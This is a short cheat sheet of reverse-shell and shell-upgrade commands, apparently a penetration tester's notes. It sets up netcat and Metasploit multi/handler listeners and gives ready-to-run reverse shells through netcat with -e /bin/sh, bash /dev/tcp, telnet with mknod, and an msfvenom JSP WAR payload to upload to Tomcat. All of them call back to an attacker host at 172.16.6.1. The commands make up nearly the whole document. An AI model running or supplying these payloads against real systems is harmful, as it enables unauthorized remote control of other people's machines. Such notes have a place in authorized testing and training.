#get installed python version
which python3
which python
#use whichever version of python is installed
python3 -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
#gives access to clear command
export TERM=xterm
#background remote shell
CTRL+Z
#on your local station
stty raw -echo;fg
ENTER Twice
stty -a #on local shell
#on remote session
stty rows 61 cols 116
Reverse Shells
Listensers
nc -nlvp 9001
Always set up a netcat listener before executing a bash reverse shell
You can also use multi/handler from metasploit to catch incoming reverse shells
msfconsole
use exploit /multi/handler
set LHOST 172.16.6.1
set LPORT 9001
run
Netcat Reverse Shell
nc 172.16.6.1 9001 -e /bin/sh
Standard netcat reverse shell (only works with some versions of nc)
Bash Reverse Shells
Good first attempt at a shell.
bash -i >& /dev/tcp/172.16.6.1/1234 0>&1
Best bash reverse shell option, has the highest percentage success rate.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.6.1 LPORT=1234 -f war > /home/kali/Documents/shell.war
This will generate a war file for upload on the Tomcat CMS. Once uploaded click on the shell option to activate it.
Catch this shell with multi/handler or just nc
msfconsole
use exploit /multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 172.16.6.1
set LPORT 1234
run
Reverse shell over the Telnet Protocol
mknod a p; telnet 172.16.6.1 1234 0<a | /bin/sh 1>a
This reverse shell makes a special character file (mknod) uses telnet to call back and direct standard output to the character file via the binary /bin/sh